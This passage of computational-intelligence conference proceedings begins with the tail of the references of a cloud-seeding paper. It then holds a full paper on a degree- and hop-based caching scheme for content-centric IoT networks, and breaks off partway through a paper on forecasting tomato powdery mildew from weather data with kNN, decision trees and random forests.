cial-weather-target-to-combat-water-shortages. Last Accessed 15 Jan 2021.
7. Zheng, W., Xue, F., Zhang, M., Wu, Q., Yang, Z., Ma, S., Liang, H., Wang, C., Wang, Y., Ai,
X., Yang, Y., & Yu, K. (2020). Charged particle (negative ion)-based cloud seeding and rain
enhancement trial design and implementation. Water, 12, 1644. https://doi.org/10.3390/w12
061644.
8. Ćurić, M., Lompar, M., Romanic, D., Zou, L., & Liang, H. (2019). Three-dimensional
modelling of precipitation enhancement by cloud seeding in three different climate zones.
Atmosphere, 10, 294. https://doi.org/10.3390/atmos10060294.
9. Quantifying snowfall from orographic cloud seeding | PNAS. https://www.pnas.org/content/
117/10/5190. Last Accessed 15 Jan 2021.
10. Yang, Y., Tan, X., Liu, D., Lu, X., Zhao, C., Lu, J., & Pan, Y. (2018). Corona discharge-induced
rain and snow formation in air. IEEE Transactions on Plasma Science, 46, 1786–1792. https://
doi.org/10.1109/TPS.2018.2820200.
11. Kumar, R. (2018). Scope of cloud seeding in India. IJRASET, 6, 4641–4645. https://doi.org/
10.22214/ijraset.2018.4762.
12. Stroyproject—about us. Manufacturer of LOZA ROCKETS. https://www.cloud-seeding.info/
page.php?id=2&lang=1. Last Accessed 16 Feb 2021.
13. Nashik: Rocket finally fired in dry zone, cloud seeding to bring in rain | Nashik News—Times
of India. https://timesofindia.indiatimes.com/city/nashik/nashik-rocket-finally-fired-in-dry-
zone-cloud-seeding-to-bring-in-rain/articleshow/48510296.cms?utm_source=contentofint
erest&utm_medium=text&utm_campaign=cppst. Last Accessed 16 Feb 2021.
14. Shukla, S., Singh, G., Sarkar, S. K., & Mehta, P. L. (2021). Novel umbrella 360 cloud
seeding based on self-landing reusable hybrid rocket. In International Conference on Inno-
vative Computing and Communications (pp. 999–1011). https://doi.org/10.1007/978-981-15-
5148-2_86.
15. Siliceo, E. P., A, A.A., Mosiño, P. A. (1963). Twelve years of cloud seeding in the Necaxa
Watershed, Mexico. Journal of Applied Meteorology and Climatology, 2, 311–323. https://doi.
org/10.1175/1520-0450(1963)002<0311:TYOCSI>2.0.CO;2.
16. Mnih, V., Kavukcuoglu, K., Silver, D., Rusu, A. A., Veness, J., Bellemare, M. G., Graves, A.,
Riedmiller, M., Fidjeland, A. K., Ostrovski, G., Petersen, S., Beattie, C., Sadik, A., Antonoglou,
I., King, H., Kumaran, D., Wierstra, D., Legg, S., & Hassabis, D. (2015). Human-level control
through deep reinforcement learning. Nature, 518, 529–533. https://doi.org/10.1038/nature
14236.
17. Xian, M., Liu, X., Yin, M., Song, K., Zhao, S., & Gao, T. (2020). Rainfall monitoring based
on machine learning by earth-space link in the ku band. IEEE Journal of Selected Topics in
Applied Earth Observations and Remote Sensing., 13, 3656–3668. https://doi.org/10.1109/JST
ARS.2020.3004375.
18. Molmud, P. (1963). Vernier exhaust perturbations on radar and altimeter systems during a lunar
landing. AIAA Journal, 1(12), 2816–2819. https://doi.org/10.2514/3.2177. https://arc.aiaa.org/
doi/abs/10.2514/3.2177?journalCode=aiaaj.
19. Li, Y., Lu, H., Tian, S., Jiao, Z., & Chen, J. T. (2011). Posture control of electromechanical-
actuator-based thrust vector system for aircraft engine. IEEE Transactions on Industrial Elec-
tronics, 59(9), 3561–3571. https://doi.org/10.1109/TIE.2011.2159351. https://ieeexplore.ieee.
org/abstract/document/5873146.
An Efficient Caching Approach
for Content-Centric-Based Internet
of Things Networks
S. Kumar (B)
Department of Systemics, School of Computer Science, Energy Acres, University of Petroleum
and Energy Studies, Bidholi, Dehradun 248007, India
R. Tiwari
Department of Virtualization, School of Computer Science, Energy Acres, University of
Petroleum and Energy Studies, Bidholi, Dehradun 248007, India
e-mail: rajeev.tiwari@ddn.upes.ac.in
G. Goel
School of Computer Science, CEC, Landran, University of Petroleum and Energy Studies, Energy
Acres, Bidholi, Dehradun 248007, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 499
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_40
500 S. Kumar et al.
1 Introduction
IoT emerges as the collection of devices, which are connected using the Internet [1,
2].The IoT devices and their applications focus on accessing the required content
with minimal latency instead of focussing on the location of the content source [3].
In this direction, the host-centric properties of current IP-based Internet environment
[4, 5] have a fundamental deviation from the data-centric requirements of the IoT
applications. The tremendous increase in the count of connected IoT nodes and their
data needs has also raised various challenges for the IP-based networks related to
the efficient handling of the content [6].
To mitigate the limitations of the existing Internet design, a novel CCN archi-
tecture has recently been proposed [7], in which each content item has a unique name
and devices access contents by name. Its in-network caching capabilities [8] make
CCN the most suitable architecture for latency-sensitive IoT applications.
For content-centric information retrieval in IoT networks, CCN implements
three data structures: the forwarding information base (FIB), the pending interest
table (PIT), and the content store (CS) [9, 10]. To access a content item, the IoT
device generates an Interest message and forwards it toward the content
provider/server using single-hop or multi-hop communication. After analysing the
Interest message, the content provider creates a content message with the required
payload and forwards it in the reverse direction toward the requester.
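The Interest/Data exchange over the three data structures can be sketched as follows. The class name, the dict-based interfaces, and the simplified one-component prefix match are illustrative; a real CCN forwarder performs longest-prefix matching and per-face bookkeeping.

```python
class CcnRouter:
    """Minimal sketch of a CCN forwarding node with CS, PIT, and FIB."""

    def __init__(self, fib):
        self.cs = {}    # Content Store: name -> payload (in-network cache)
        self.pit = {}   # Pending Interest Table: name -> requesting faces
        self.fib = fib  # Forwarding Information Base: prefix -> next hop

    def on_interest(self, name, face):
        if name in self.cs:                          # cache hit: answer locally
            return ("data", name, self.cs[name])
        self.pit.setdefault(name, set()).add(face)   # remember who asked
        prefix = name.split("/")[1]                  # simplified prefix match
        return ("forward", self.fib.get(prefix))

    def on_data(self, name, payload):
        self.cs[name] = payload                      # cache the passing content
        return self.pit.pop(name, set())             # faces to satisfy

r = CcnRouter({"sensor": "router-B"})
miss = r.on_interest("/sensor/temp/1", face=0)   # miss: forwarded upstream
faces = r.on_data("/sensor/temp/1", b"21.5C")    # cached, returned to face 0
hit = r.on_interest("/sensor/temp/1", face=2)    # second request: cache hit
```

The second Interest is satisfied from the CS without travelling to the provider, which is exactly the latency and server-load benefit the text attributes to in-network caching.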
During content-message forwarding, the intermediate routers also perform content
caching to reduce server load and bandwidth requirements, which also increases QoS
for the requesters [11]. Generally, intermediate routers have extremely small cache
storage compared to the content-catalogue size of the network. Hence, efficient
content placement/replacement operations play an important role in the performance
of the CCN. Caching decisions include content placement (choosing an appropriate
router to cache the content) and content replacement (evicting older content from
the router's CS when it becomes full) [12, 13]. To effectively utilize the available
network resources, an efficient caching scheme is required that increases the QoS
for the IoT devices.
In this direction, it is argued that placing the frequently accessed contents for a
longer duration on routers that have a higher degree centrality and are near the
edges of the network would improve network performance. Therefore, the proposed
scheme jointly considers the router's degree, the distance traversed by the Interest
message from the content provider, and content popularity for caching decisions
during content forwarding.
2 Literature Review
Presently, the connected world of IoT devices has become a reality spanning several
application domains such as smart wearables, smart cities, health care, and
energy-management systems [14]. To improve data dissemination in the IoT
environment, CCN implements in-network caching to minimize network delay
and bandwidth requirements. An effective content-caching mechanism improves the QoS
offered to the IoT devices (requesters), as the cache sizes of network routers are
far too small to store the huge data transmissions. Therefore, researchers have
suggested various caching strategies that place contents in network routers to
reduce server load and deliver requested contents with reduced latency.
The leave-copy-everywhere (LCE) [7] caching scheme is the traditional strategy
for CCN; it copies the content into every intermediate router. The random-
probability-based placement scheme (Prob) [15] caches contents with a fixed random
probability. It provides a simple caching mechanism that is independent of network
and content characteristics. The ProbCache [16] scheme estimates the caching
capability of a route during placement decisions and fairly multiplexes the
contents of diverged routes.
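The two simplest baselines above can be sketched in a few lines: LCE caches at every on-path router, while Prob(p) caches at each router independently with a fixed probability (p = 0.3 is the variant used for comparison in the evaluation section). Modelling router caches as plain sets is an illustrative simplification.

```python
import random

def lce(path_caches, content):
    """Leave-copy-everywhere: cache the passing content at every router."""
    for cache in path_caches:
        cache.add(content)

def prob(path_caches, content, p=0.3):
    """Prob(p): each on-path router caches independently with probability p."""
    for cache in path_caches:
        if random.random() < p:
            cache.add(content)

path = [set() for _ in range(5)]      # five routers between consumer and provider
lce(path, "video/seg1")               # present in all 5 caches
prob(path, "video/seg2")              # present in ~30% of caches on average
```

LCE maximizes redundancy at the cost of wasted cache space on duplicates; Prob(p) trades some hit ratio for diversity, which is the tension the more elaborate schemes in this section try to resolve.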
A centrality-metric-centred caching strategy is recommended in [17], which selec-
tively places content replicas in the network by considering the betweenness
centrality of the on-path routers. The CPNDD scheme [18] jointly considers node-
degree centrality and hop-count characteristics to determine a suitable router
for content placement. The caching strategy discussed in [19] uses a combination
of several centrality metrics and content popularity for caching decisions.
The MAX-gain in-network caching (MAGIC) [20] scheme performs content
caching using the content access pattern and distance parameters. The fine-grained
popularity-based caching (FGPC) scheme [21] determines content access frequency
using a dedicated data structure and uses a static threshold to identify frequently
accessed contents. The DPWCS [22] implements a novel data structure in all network
routers to filter popular contents and performs caching in those intermediate
routers that experience a higher access frequency for the content.
Table 1 Simulation parameters

Parameter                                   Value
CS(Ri)                                      50
ψ                                           0.1–1.0
λ                                           50/s
Payload size                                1 KB
Content catalogue size (|N|)                5000
Exponent value in Zipf distribution (α)     0.8
Network topology                            Abilene [23]
Simulation duration                         1050 STU (Simulation Time Units)
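The request workload implied by Table 1 can be reproduced with a Zipf(α) popularity profile: content of rank k is requested with probability proportional to 1/k^α, using α = 0.8 over a catalogue of 5000 items. The generator below is a sketch of that workload, not code from the paper.

```python
import random

def zipf_weights(n, alpha):
    """Normalized Zipf(alpha) popularity weights for ranks 1..n."""
    raw = [1.0 / (k ** alpha) for k in range(1, n + 1)]
    total = sum(raw)
    return [w / total for w in raw]

N, ALPHA = 5000, 0.8                     # Table 1: |N| = 5000, alpha = 0.8
weights = zipf_weights(N, ALPHA)

# Draw one request: content ids 1..N with the skewed popularity profile.
request = random.choices(range(1, N + 1), weights=weights, k=1)[0]
```

With α = 0.8 the popularity skew is moderate: the head of the catalogue dominates the request stream, which is what makes small caches (50 or 100 items out of 5000) effective at all.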
Gain_{R_i}^{C_j} = (DC(R_i) / Max(DC(R_i))) × (Hop_{C_j} / Hop_{I_j})    (1)
If CS(Ri) is already full, the older content is removed from the cache space
using the least-frequently-used (LFU) cache replacement strategy. Then, Ri forwards
the content toward the requesters after making the caching decision using Eq. 2.

Cache_Content(R_i, C_j) = True,  if Gain_{R_i}^{C_j} ≥ ψ
                          False, if Gain_{R_i}^{C_j} < ψ    (2)
To find the optimal value of ψ, the performance of the proposed caching scheme
was explored for different values of ψ in ndnSIM simulations with the parameters
listed in Table 1. The best network performance was obtained with ψ = 0.2, and this
value is therefore used in the simulations. Although the configuration of the
threshold parameter is somewhat arbitrary and may change for other network
topologies, it provides a good starting point for exploring caching performance
in the CCN-based IoT environment.
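Equations (1) and (2) transcribe directly into code. The argument names are mine, and the reading of Hop_{C_j}/Hop_{I_j} as "hops covered so far by the content message over hops covered by the Interest" follows the surrounding description.

```python
def gain(dc_ri, max_dc, hop_cj, hop_ij):
    """Eq. (1): normalized degree centrality times the hop-count ratio."""
    return (dc_ri / max_dc) * (hop_cj / hop_ij)

def cache_content(dc_ri, max_dc, hop_cj, hop_ij, psi=0.2):
    """Eq. (2): cache iff the gain reaches the threshold psi (0.2 here)."""
    return gain(dc_ri, max_dc, hop_cj, hop_ij) >= psi

# A router with half the maximum degree, halfway back along a 4-hop path:
decision = cache_content(dc_ri=2, max_dc=4, hop_cj=2, hop_ij=4)  # gain = 0.25
```

The product form means a low-degree router deep inside the network needs a proportionally longer traversed distance before it caches, which biases placement toward well-connected routers near the requesting edge, as the scheme intends.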
4 Performance Evaluation
The QoS delivered by the proposed caching scheme is examined against several
competing peer strategies from the literature review: the DC-based, LCE,
Random-Prob(0.3), and FGPC caching mechanisms. The default cache replacement
strategy used with the peer schemes is least recently used (LRU). The performance
of the caching schemes is compared on three parameters: cache hit ratio, network
hop count, and the latency (delay) in retrieving the requested content.
Fig. 1 Cache hit ratio with α = 0.8, λ = 50/s, and |N| = 5000: (a) CS(Ri) = 50; (b) CS(Ri) = 100
The average hit ratio is the fraction of cache-hit operations among all requests
encountered by the routers per unit time. Figure 1a shows the average network hit
ratio when the cache size of in-network routers is set to 50 contents. Initially,
the caching schemes experience a lower average hit ratio because the network caches
are empty at the beginning. Over time, the performance of the content-placement
strategies increases as routers begin placing forwarded contents according to their
caching policies. In the simulations, the proposed scheme shows 4.3%, 5.1%, 4.8%,
and 5.0% improvements in the average cache hit ratio over the DC-based, LCE,
Prob(0.3), and FGPC caching strategies, respectively. When the cache size of the
network routers is increased to 100 contents per router, the hit ratio of each
caching mechanism improves, as shown in Fig. 1b. The results illustrate that the
proposed mechanism outperforms the peer schemes, demonstrating up to a 6.1% gain
in the average hit ratio.
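The metric just described can be sketched as a simple aggregation over per-router counters in a measurement window; the counts below are made-up illustration values, not simulation output.

```python
def average_hit_ratio(per_router_counts):
    """Cache hits as a fraction of all requests seen in one window.

    per_router_counts: list of (hits, requests) pairs, one per router.
    """
    hits = sum(h for h, _ in per_router_counts)
    requests = sum(r for _, r in per_router_counts)
    return hits / requests if requests else 0.0

window = [(12, 300), (30, 450), (6, 250)]   # three routers in one window
ratio = average_hit_ratio(window)           # 48 / 1000 = 0.048
```

Aggregating hits and requests before dividing (rather than averaging per-router ratios) weights busy routers proportionally, which matches the "per unit time over all routers" definition in the text.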
The hop-count metric for an Interest is the sum of the number of hops traversed by
the Interest message to reach the content provider and by the corresponding content
message during its delivery. Figure 2a illustrates the average network hop count
observed for the caching mechanisms when the caching capacity of network routers
is 50. In this scenario, the proposed scheme achieves 13.1%, 15.4%, 14.5%, and
14.2% drops in the average hop count compared with the DC-based, LCE, Prob(0.3),
and FGPC schemes, respectively. When the caching capacity of the intermediate
routers increases to 100 contents, the proposed solution achieves up to a 16.6%
drop in the average network hop count relative to the peer schemes.
The average network delay is the time between the creation of an Interest message
and the delivery of the corresponding content to the requester. With the router
caching capacity set to 50, the proposed strategy reduces the average delay by up
to 14.5% compared with the existing schemes, as shown in Fig. 3a. Analogous
performance gains are obtained when the cache space of the routers is increased
to 100, where the proposed strategy decreases the average network delay by 11–12.5%
relative to the existing peer schemes, as shown in Fig. 3b.
Fig. 2 Average network hop count with α = 0.8, λ = 50/s, and |N| = 5000: (a) CS(Ri) = 50; (b) CS(Ri) = 100
Fig. 3 Average network delay (in microseconds) with α = 0.8, λ = 50/s, and |N| = 5000: (a) Csize = 50; (b) Csize = 100
5 Conclusion
In this paper, a novel caching scheme suitable for the CCN-based IoT environment
has been proposed. The scheme jointly considers node-degree centrality, hop-count
metrics, and the LFU strategy for content caching decisions. Its performance is
compared with various state-of-the-art schemes, namely LCE, DC-based, Prob(0.3),
and FGPC. When the ratio of CS(Ri) to |N| is 1%, the proposed strategy achieves
up to a 5.1% increase in the average cache hit ratio and reduces the network hop
count and delay by up to 15.4% and 14.5%, respectively, compared with the peer
caching schemes. Analogous improvements are observed when the cache space of the
network routers is enlarged to 100 contents (2% of |N|), where the proposed scheme
again shows significant gains over the competing strategies. Hence, the proposed
scheme is suitable for large-scale CCN-based IoT networks and their applications.
In future work, more characteristics of the contents and networks will be explored
to improve QoS under dynamic network topologies.
References
1. Khan, E., Garg, D., Tiwari, R., & Upadhyay, S. (2018). Automated toll tax collection system
using cloud database. In 2018 3rd International Conference On Internet of Things: Smart
Innovation and Usages (IoT-SIU) (pp 1–5). IEEE.
2. Djama, A., Djamaa, B., & Senouci, M. R. (2020). Information-centric networking solutions
for the internet of things: a systematic mapping review. Computer Communications.
3. Din, I. U., Asmat, H., & Guizani, M. (2019). A review of information centric network based
internet of things: Communication architectures, design issues, and research opportunities.
Multimedia Tools and Applications, 78(21), 30241–30256.
4. Tiwari, R., & Kumar, N. (2016). An adaptive cache invalidation technique for wireless
environments. Telecommunication Systems, 62(1), 149–165.
5. Tiwari, R., & Kumar, N. (2015). Minimizing query delay using co-operation in ivanet. Procedia
Computer Science, 57, 84–90.
6. Arshad, S., Azam, M. A., Rehmani, M. H., & Loo, J. (2018). Recent advances in information-
centric networking-based internet of things (icn-iot). IEEE Internet of Things Journal, 6(2),
2128–2158.
7. Jacobson, V., Smetters, D. K., Thornton, J. D., Plass, M. F., Briggs, N. H., & Braynard, R.
L. (2009). Networking named content. In Proceedings of the 5th International Conference on
Emerging Networking Experiments and Technologies. Association for Computing Machinery,
New York, NY, USA, CoNEXT ’09 (pp. 1–12). https://doi.org/10.1145/1658939.1658941
8. Hail, M. A., Amadeo, M., Molinaro, A., & Fischer, S. (2015). Caching in named data networking
for the wireless internet of things. In 2015 International Conference on Recent Advances in
Internet of Things (RIoT ) (pp. 1–6). IEEE.
9. Jacobson, V., Mosko, M., Smetters, D., & Garcia-Luna-Aceves, J. (2007). Content-centric
networking, whitepaper describing future assurable global networks (pp. 1–9). Palo Alto
Research Center, Inc.
10. Kumar, S., Tiwari, R., Obaidat, M.S., Kumar, N., Hsiao, K. F. (2020). Cpndd: Content placement
approach in content centric networking. In ICC 2020–2020. IEEE International Conference
on Communications (ICC) (pp. 1–6). IEEE.
11. Abdullahi, I., Arif, S., & Hassan, S. (2015). Survey on caching approaches in information
centric networking. Journal of Network and Computer Applications, 56, 48–59.
12. Tiwari, R., & Kumar, N. (2012). A novel hybrid approach for web caching. In 2012 Sixth International
Conference on Innovative Mobile and Internet Services in Ubiquitous Computing (pp. 512–
517). IEEE.
13. Tiwari, R., Sharma, H. K., Upadhyay, S., Sachan, S., & Sharma, A. (2019). Automated parking
system-cloud and iot based technique. International Journal of Engineering and Advanced
Technology (IJEAT), 8(4C), 116–123.
14. Naeem, M. A., Ali, R., Kim, B. S., Nor, S. A., & Hassan, S. (2018). A periodic caching strategy
solution for the smart city in information-centric internet of things. Sustainability, 10(7), 2576.
15. Arianfar, S., Nikander, P., Ott, J. (2010). On content-centric router design and implications.
In Proceedings of the Re-Architecting the Internet Workshop, Association for Computing
Machinery, New York, NY, USA, ReARCH ’10 (pp. 1–6). https://doi.org/10.1145/1921233.
1921240
16. Psaras, I., Chai, W. K., Pavlou, G. (2012). Probabilistic in-network caching for information-
centric networks. In Proceedings of the Second Edition of the ICN Workshop on Information-
Centric Networking (pp. 55–60).
17. Chai, W. K., He, D., Psaras, I., & Pavlou, G. (2013). Cache “less for more” in information-centric
networks (extended version). Computer Communications, 36(7), 758–770.
18. Kumar, S., Tiwari, R. (2020). An efficient content placement scheme based on normalized node
degree in content centric networking. Cluster Computing, 1–15.
19. Gao, Y., Zhou, J. (2019). Probabilistic caching mechanism based on software defined content
centric network. In 2019 IEEE 11th International Conference on Communication Software and
Networks (ICCSN) (pp. 210–214). IEEE.
20. Ren, J., Qi, W., Westphal, C., Wang, J., Lu, K., Liu, S., & Wang, S. (2014). MAGIC: a distributed
MAx-gain in-network caching strategy in information centric networks. In 2014 IEEE Confer-
ence on Computer Communications Workshops (INFOCOM WKSHPS) (pp. 470–475). IEEE.
https://doi.org/10.1109/infcomw.2014.6849277
21. Ong, M. D., Chen, M., Taleb, T., Wang, X., & Leung, V. C. (2014). FGPC: fine-grained
popularity-based caching design for content centric networking. In Proceedings of the 17th
ACM International Conference on Modeling Analysis and Simulation of Wireless and Mobile
Systems—MSWiM ’14 (pp. 295–302). ACM Press. https://doi.org/10.1145/2641798.2641837
22. Kumar, S., & Tiwari, R. (2020). Optimized content centric networking for future internet:
dynamic popularity window based caching scheme. Computer Networks, 179, 107434. https://
doi.org/10.1016/j.comnet.2020.107434
23. Alderson, D., Li, L., Willinger, W., & Doyle, J. C. (2005). Understanding internet topology:
Principles models and validation. IEEE/ACM Transactions on Networking, 13(6), 1205–1218.
A Forecasting Technique for Powdery
Mildew Disease Prediction in Tomato
Plants
Anshul Bhatia, Anuradha Chug, Amit Prakash Singh, Ravinder Pal Singh,
and Dinesh Singh
Abstract In the current scenario, plant disease detection is attracting the attention of many agricultural scientists. Plant diseases are deeply influenced by weather conditions, and each disease has its own weather requirements. Changes in weather parameters such as humidity, temperature, wind speed, etc., can cause many diseases in tomato plants. The current empirical study focuses on powdery mildew, a disease caused by the fungus Leveillula taurica, which belongs to the class Leotiomycetes and is responsible for the occurrence of this specific disease in tomatoes. In this research, three weather-based prediction models have been developed using the k-nearest neighbor (kNN), decision tree (DT), and random forest (RF) algorithms for powdery mildew disease prediction in tomatoes at an early stage. Results indicate that the proposed model, based on the RF algorithm, shows the best accuracy of 93.24% for the tomato powdery mildew disease (TPMD) dataset. A real-time version of the proposed model can be used by agricultural experts to take
preventive measures in the most sensitive areas that are prone to powdery mildew
disease based on the weather conditions. Hence, timely intervention would help in
reducing the loss in productivity of tomato crops which will further benefit the global
economy, agricultural production, and the food industry.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 509
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_41
1 Introduction
Tomato is one of the most widely consumed fruit crops, whose yield and quality are highly affected by rapidly changing weather conditions as well as global warming. This crop suffers from various severe diseases, namely early blight, bacterial leaf spot, leaf mold, powdery mildew, fusarium wilt, gray mold, late blight, and many more. Powdery mildew is the most common fungal disease found in tomato plants and is caused by the harmful pathogen Leveillula taurica [1].
Changes in the climatic conditions can aggravate the risk of disease development in
the agricultural sector. A standardized range of weather conditions of a particular
area plays a crucial role in the productivity of any crop. However, any deviation
from the normal weather conditions may cause the risk of disease development in
the plant which can degrade its quality and productivity. Weather parameters such
as wind speed, global radiation, humidity, temperature, and leaf wetness are the
most critical factors, which are liable for the growth of powdery mildew disease in
tomato crop [2, 3]. In the last decade, agricultural scientists have predominantly proposed image-based forecasting models for the prediction of tomato powdery mildew disease [4–8]; however, very few have worked on weather-based disease forecasting models [2, 9–12].
Many scientists have worked on tomato powdery mildew disease forecasting till
date, and few important studies are discussed here. Guzman-Plazola [9] proposed
a spray forecasting model for early prediction and prevention of powdery mildew
disease in tomato plants using a well-known machine learning approach, i.e., linear
discriminant analysis (LDA). He tested this model for two years between 1995 and
1996 on tomato fields of northern San Joaquin and southern Sacramento Valleys of
California. This model was capable of generating risk warnings and spray recom-
mendations based on the favorable weather conditions for the development of this
disease. In the year 2010, Ghaffari et al. [13] used various techniques based on artificial neural networks (ANNs) for early detection of the same disease as is addressed in the current research. In one of the studies, Rumpf et al. [14] applied the concept of
hyperspectral reflectance in conjunction with a support vector machine (SVM) classifier for the timely detection of powdery mildew. Further, Prince et al. [15] have also
contributed to this research by developing an image-based disease prediction model
by using SVM classifier. In the year 2015, Mokhtar et al. [16] also successfully
applied an SVM-based machine learning approach with Gabor wavelet transform
for disease detection. In one of the researches, Fuentes et al. [4] have also developed
disease prediction models by using various deep learning techniques and found that
the proposed models were efficient enough to identify the nine different types of pests
and tomato plant diseases including the complex scenarios of plants’ surrounding
areas. Authors have also built a mobile application using deep learning techniques for the prediction of many tomato plant diseases, powdery mildew among them [5]; that application takes an image as input. In the current research, by contrast, we have tried to find the best possible machine learning technique for developing a forecasting model for powdery mildew disease detection in tomato plants using sensor data. Three machine learning techniques, viz. k-nearest neighbor (kNN) [17],
decision tree (DT) [18], and random forest (RF) [19] are used to build the disease
prediction model. The performance of all the three models has been compared using
the most prominent accuracy metric which in turn helped to choose the best predic-
tion model. Results of this study can help the farmers as well as agricultural scientists
for early detection of this disease, and further, timely preventive measures can be
adopted in order to increase the quality of the crop.
The remaining paper is organized in the following manner: Sect. 2 highlights the
prior studies followed by research methodology in Sect. 3. Experimental results are
discussed in Sect. 4. Lastly, Sect. 5 summarizes the whole study with its future scope.
2 Literature Review
In literature, many researchers have proposed disease prediction models for various
plants. A few of them are discussed in this section. In 2016, Sabrol and Kumar used the concept of DT to detect various tomato plant diseases; their model achieved an accuracy of 76% [20]. Further, in 2018, Verma et al. published a
review paper on various disease prediction models based on machine learning and
image processing techniques [5]. In the next year, they developed a deep learning-
based android application for tomato disease prediction [8]. In 2020, Verma et al.
have also used the concept of capsule networks for potato disease diagnosis. Their
model was 91.83% accurate [7]. Further, in 2020, Bhatia et al. have used the concept
of extreme learning machine (ELM) algorithm with various resampling techniques to
detect powdery mildew disease in tomato plants [12], achieving a prediction accuracy of 89.91%. In the same year, they also proposed a hybridized model for tomato powdery mildew disease prediction; their model was 92.37% accurate [10]. Again in 2020, Bhatia et al. proposed a feature selection-based approach for soybean disease diagnosis, which achieved an accuracy of 98.10% [11]. In the current study, we have also tried to develop a robust and
efficient technique for powdery mildew disease prediction in tomato plants.
3 Research Methodology
This section explains the overall methodology being followed in this paper with a
diagrammatic representation as shown in Fig. 1. Initially, tomato powdery mildew
disease (TPMD) dataset has been divided into 70% training and 30% testing data.
Further, three prediction models have been developed for TPMD dataset using kNN,
DT, and RF techniques. Lastly, on the basis of the performance measure metric, i.e.,
accuracy, the best model has been identified among the three prediction models
deployed in the current study. The proposed method has been implemented in
“RStudio Version 1.1.463.” The datasets have been elaborated in Sect. 3.1. Further,
an overview of kNN, DT, and RF algorithms has been provided in Sects. 3.2, 3.3
and 3.4, respectively. Lastly, Sect. 3.5 describes the performance metric used in this
study, i.e., the accuracy.
3.1 Dataset
A sensor-based time-series dataset, i.e., TPMD has been used in this study [2]. The
TPMD dataset provides information about the conduciveness of a particular day in
terms of tomato powdery mildew disease development based on various meteorolog-
ical parameters. These parameters include wind speed (WS), temperature (T), global
radiations (GR), relative humidity (RH), and leaf wetness (LW). The TPMD dataset
comprises 244 observations, in which the above-mentioned meteorological parameters are considered as predictive (independent) variables, and the conduciveness or non-conduciveness of a day is taken as the response (dependent) variable. The dataset can be accessed through the following link: https://bit.ly/2QQpNvW.
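As an illustration, loading the dataset and making the paper's 70/30 split can be sketched in Python (the authors' own implementation was in RStudio). The CSV column names used here are assumptions, since the file layout is not specified in the text:

```python
import csv
import random

# Assumed column names; the actual TPMD file may label its columns differently.
PREDICTORS = ["WS", "T", "GR", "RH", "LW"]

def load_tpmd(path):
    """Read the TPMD CSV into predictor rows X and response labels y."""
    X, y = [], []
    with open(path, newline="") as f:
        for row in csv.DictReader(f):
            X.append([float(row[c]) for c in PREDICTORS])
            y.append(row["Conducive"])  # assumed name of the response column
    return X, y

def train_test_split(X, y, test_frac=0.30, seed=42):
    """Shuffle the indices and split into 70% training / 30% testing data."""
    idx = list(range(len(X)))
    random.Random(seed).shuffle(idx)
    n_test = round(len(idx) * test_frac)
    test, train = idx[:n_test], idx[n_test:]
    return ([X[i] for i in train], [y[i] for i in train],
            [X[i] for i in test], [y[i] for i in test])
```

Seeding the shuffle keeps the 70/30 division reproducible across runs.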
3.2 k-Nearest Neighbor (kNN)
kNN is a widely used supervised machine learning algorithm which uses the concept
of “close proximity” (similar things are near to each other) to predict the class label of a new data point [17]. Let us assume that X is a training dataset which contains n data points (X1, X2, …, Xn) and m attributes (a1, a2, …, am). Further, k is an assumed integer value which indicates the number of nearest data points, and Yi is
a test data point with the same number of attributes as the training dataset. So, the working of kNN can be understood with the help of the following steps:
Step 1: Calculate the distance between the test data point Yi and each row of the training dataset X with the help of one of the distance functions, namely Manhattan or Euclidean. Both of these functions are special cases of the Minkowski distance formula, which calculates the distance D between two variables U and V as shown in Eq. (1). In Eq. (1), p = 1 gives the Manhattan distance and p = 2 gives the Euclidean distance.

D = ( Σ_{i=1}^{n} |Ui − Vi|^p )^{1/p}    (1)
Step 2: Afterward, on the basis of the distance from test data point Y i , sort each
training sample (data point) in ascending order and store it in an array.
Step 3: Next, kNN algorithm will choose top k data points from the sorted array.
Step 4: Lastly, a class label will be assigned to the test data point on the basis of
the most frequent class of these k data points or the nearest neighbors.
The above algorithm can be explained with the help of an example. Suppose, in
Fig. 2, “circle” symbol represents the data samples belonging to the conducive class,
whereas the “star” symbol shows the data samples belonging to the non-conducive
class. Further, Q1 is the new sample to be classified and k = 3. Hence, the kNN algorithm will find the three nearest neighbors of the new sample Q1. It can be seen from Fig. 2 that two of the three nearest neighbors belong to the non-conducive class, which is why sample Q1 is assigned to the non-conducive class.
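The four steps above can be sketched in Python (a minimal illustration; the paper's models were built in RStudio):

```python
from collections import Counter

def minkowski(u, v, p=2):
    """Eq. (1): p = 1 gives the Manhattan distance, p = 2 the Euclidean."""
    return sum(abs(a - b) ** p for a, b in zip(u, v)) ** (1.0 / p)

def knn_predict(X_train, y_train, query, k=3, p=2):
    """Steps 1-4: compute distances, sort in ascending order,
    take the top k, and assign the most frequent class among them."""
    dists = sorted((minkowski(x, query, p), label)
                   for x, label in zip(X_train, y_train))
    top_k = [label for _, label in dists[:k]]
    return Counter(top_k).most_common(1)[0][0]
```

With k = 3 and a layout like Fig. 2, a query whose three nearest neighbors include two non-conducive samples is assigned to the non-conducive class.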
Fig. 2 kNN classification example: conducive and non-conducive samples plotted with temperature on the X-axis and relative humidity on the Y-axis
3.5 Accuracy
Accuracy is the most widely used performance metric, which is equal to the ratio between the number of accurate predictions made by the classification model and the total number of predictions, as shown in Eq. (2). It can be calculated using a two-dimensional table known as the confusion matrix.
Figure 4 shows a sample confusion matrix.
There are some basic terms associated with any confusion matrix which are as
follows:
• The number of correctly identified instances that do not belong to the class (True
Negative (TN))
• The number of correctly identified instances that belong to the class (True Positive
(TP))
• The number of instances that were either incorrectly assigned to the class (False Positive (FP)) or not identified as a class instance (False Negative (FN)).

Accuracy = (TP + TN)/(TP + TN + FP + FN)    (2)
4 Experimental Results
This section discusses the results of the experiment performed on the TPMD dataset.
Initially, the dataset was divided into 70–30 Train-Test ratio. After this, the Train-Set
was used for developing the prediction models for tomato powdery mildew disease
forecasting based on DT, kNN, and RF algorithms. Further, all the three trained
